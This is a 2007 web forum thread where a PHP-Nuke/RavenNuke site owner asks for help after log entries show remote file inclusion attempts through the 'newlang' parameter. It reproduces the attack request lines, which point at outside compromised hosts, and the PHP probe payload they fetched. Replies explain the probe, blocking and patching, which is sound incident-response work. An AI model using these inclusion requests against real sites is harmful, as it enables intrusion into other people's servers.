Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
lofty3109
New Member
New Member


Joined: Nov 18, 2007
Posts: 7
Location: Sweden

PostPosted: Fri Dec 14, 2007 5:44 am Reply with quote

Hi there,

I am using vers 2.10.01 and the latest Sentinel installed but I woke up this morning to find someone had tried to hack my site. I don't know exactly what they have done but the site is now throwing up a 500 Internal Server Error, though upon checking they appear to have deleted the .htaccess and .staccess files on the server. I was going to re-up a backup of the site but wondered, if they got in they might be waiting for me to do that and try something again. I have checked the cPanel logs and the following is what its saying, I hope this is'nt too much info!

165.228.128.11 - - [13/Dec/2007:21:39:45 -0500] "GET /index.php?newlang=http%3A%2F%2Flnx.sarapica.net%2Fart%2Fufo%2Fuco%2F HTTP/1.1" 200 1322 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
202.71.147.77 - - [13/Dec/2007:21:39:47 -0500] "GET /index.php?newlang=http%3A%2F%2Fbtnflower.com%2Fpay%2Flog%2Forak%2Ftoja%2F HTTP/1.0" 500 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
165.228.133.11 - - [13/Dec/2007:21:39:48 -0500] "GET /index.php?newlang=http%3A%2F%2Fwww.insanechicken.com%2F%2FphpMyAdmin%2Flibraries%2Fanera%2Fijuraz%2F HTTP/1.1" 500 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
74.208.44.48 - - [13/Dec/2007:21:39:52 -0500] "GET /index.php?newlang=http%3A%2F%2Fwww.ujoo.co.kr%2Fimages%2Fbar%2Fojilub%2Fizemuf%2F HTTP/1.1" 500 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


Checking the IP in the email Sentinel sent me when it blocked them said they originate from Australia (165.228.128.11) There are 2 lines in the email which say the following:

Query String: w*w.dicamus.eu/index.php?newlang=http://lnx.sarapica.net/art/ufo/uco/
Get String: w*w.dicamus.eu/index.php?newlang=http://lnx.sarapica.net/art/ufo/uco/

Does anyone know what h**p://lnx.sarapica.net/art/ufo/uco/ is? I don't have a clue.

The site I had only had a main page, nothing else, no forum, chat page, gallery, nothing.

Does anyone have and ideas what they have done/tried to do? Should I restore a backup? Any help or info would be appreciated. I have also informed my host and awaiting there reply but thought I would ask you guys as well.

Thanks,

Anthony

_________________
The rewards in business go to the man who does something with an idea.

-William Benton- 
View user's profile Send private message Visit poster's website
Dawg
RavenNuke(tm) Development Team


Joined: Nov 07, 2003
Posts: 910

PostPosted: Fri Dec 14, 2007 6:06 am Reply with quote

Hmmmmm.....I would restore from backup and set the string blocker to ban sarapica

At first look it looks like a remote injection attempt but the url

comes back to....
Code:
<?php echo md5("just_a_test");?>


Code:
http%3A%2F%2Fbtnflower.com%2Fpay%2Flog%2Forak%2Ftoja%2F 
Comes back with the same....

I do not know if this would do anything...I will let someone in the know reply to that part....

Dave
 
View user's profile Send private message
lofty3109
PostPosted: Fri Dec 14, 2007 10:06 am Reply with quote

Thanks Dawg for the speedy reply. I restored a backup but it was corrupt Crying or Very sad I

have just reinstalled everything again, hopefully everything will be ok

Anthony
 
Dawg
PostPosted: Fri Dec 14, 2007 10:09 am Reply with quote

Anyone can BackUp...it is those that can restore that matter!

Dawg
 
lofty3109
PostPosted: Fri Dec 14, 2007 12:27 pm Reply with quote

Hahaha you are right Dawg!!

I have just been hit 3 times in succession, luckily Sentinel blocked them. The IP's are (if anyone wants to block them too) are:

194.150.247.1
211.142.116.205
201.134.177.1

Not checked them out yet

Anthony
 
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Fri Dec 14, 2007 3:04 pm Reply with quote

Hmm RavenNuke should be protected from that. "newlang" is a old vulnerability.
If you see any others attacks to different scripts that worked, let us know

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
Dawg
PostPosted: Fri Dec 14, 2007 3:45 pm Reply with quote

Code:
<?php echo md5("just_a_test");?>


evaders99,
What were they trying to do with this?

Dawg
 
montego
Site Admin


Joined: Aug 29, 2004
Posts: 9457
Location: Arizona

PostPosted: Fri Dec 14, 2007 7:34 pm Reply with quote

I think they were just probing whether an include of their file would actually work. But, why the md5 function is interesting...

I have checked the RN code around $newlang and I just cannot see at first glance how it can be exploited. Definitely let us know (in private please) if you find anything else.

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
lofty3109
PostPosted: Fri Dec 14, 2007 10:54 pm Reply with quote

Dawg wrote:
Code:
<?php echo md5("just_a_test");?>


evaders99,
What were they trying to do with this?

Dawg


I wondered the same when I clicked on the links in the emails Sentinel sent me when they blocked the last 3 IP's, interesting.

Thanks alot for all the help/info, much appreciated.

Anthony
 
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 17086

PostPosted: Fri Dec 14, 2007 11:48 pm Reply with quote

Dawg wrote:
What were they trying to do with this?

Since the code was exposed it seems obvious that their script did not work. If it had it would have shown c6db3524fe71d6c576098805a07e79e4. md5() in *nuke is only used for passwords so my guess is that they were probing in order to develop their next baby, or should I say kiddie, step killing me

I would guess that they have successfully exploited these sites and are basically using them as mindless drones. I doubt that the owners of the sites even know they have been compromised.

http%3A%2F%2Flnx.sarapica.net%2Fart%2Fufo%2Fuco%2F
which is h*tp://lnx.sarapica.net/art/ufo/uco/

http%3A%2F%2Fbtnflower.com%2Fpay%2Flog%2Forak%2Ftoja%2F
which is h*tp://btnflower.com/pay/log/orak/toja/

http%3A%2F%2Fwww.insanechicken.com%2F%2FphpMyAdmin%2Flibraries%2Fanera%2Fijuraz%2F
which is h*tp://www.insanechicken.com//phpMyAdmin/libraries/anera/ijuraz/

http%3A%2F%2Fwww.ujoo.co.kr%2Fimages%2Fbar%2Fojilub%2Fizemuf%2F
which is h*tp://www.ujoo.co.kr/images/bar/ojilub/izemuf/

Try to contact the owners of the above mentioned sites and let them know that they have been compromised and are being used in an attempt to exploit other sites and that they will be implicated in Internet terrorism. Yes, these acts are classified as terrorism. Don't ya just love it?
 
View user's profile Send private message
evaders99
PostPosted: Fri Dec 14, 2007 11:53 pm Reply with quote

Yep simple probe scripts. These testers just want some valid data to show their attacks worked. It could be a simple echo, so why md5? Who knows.
 
lofty3109
PostPosted: Sat Dec 15, 2007 6:31 am Reply with quote

Many, many thanks for all your help, its very much appreciated.

Its nice to know theres a group of people like you lot who take the time to help people like myself.

@ Raven,

I will try and inform the owners of the sites that have been comprimised, I am sure they would be interested to know!

Anthony
 
Raven
PostPosted: Sat Dec 15, 2007 7:36 am Reply with quote

RavensScripts
 
vaudevillian
Worker
Worker


Joined: Jan 18, 2008
Posts: 143

PostPosted: Fri Jan 18, 2008 7:43 pm Reply with quote

They are still at it.....

195.235.59.37 from this IP
Sentinal picking up this hack attempt and sending me the link of the contaned info:

Code:
<?php echo md5 ("just_a_test");?>


Isnt the md5 part of the cgi folder?
 
View user's profile Send private message Send e-mail
evaders99
PostPosted: Fri Jan 18, 2008 9:39 pm Reply with quote

They are all automated these days. No way to stop them.

That is just a probe to tell the automated script: "hey this user is vulnerable"
Once this tester is done (it isn't malicious itself), then the script can run whatever file with other commands to continue the hack.

md5 has no importance here. They could have easily just echo'd out any text.
 
vaudevillian
PostPosted: Fri Jan 18, 2008 10:21 pm Reply with quote

so if sentinal picked it up that means im safe right?
 
evaders99
PostPosted: Sat Jan 19, 2008 9:39 pm Reply with quote

Yes. Just keep your site patched and you'll be fine
 
vaudevillian
PostPosted: Sun Jan 20, 2008 11:08 am Reply with quote

its uptodate. just waiting for the next version of ravennukes version Smile
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©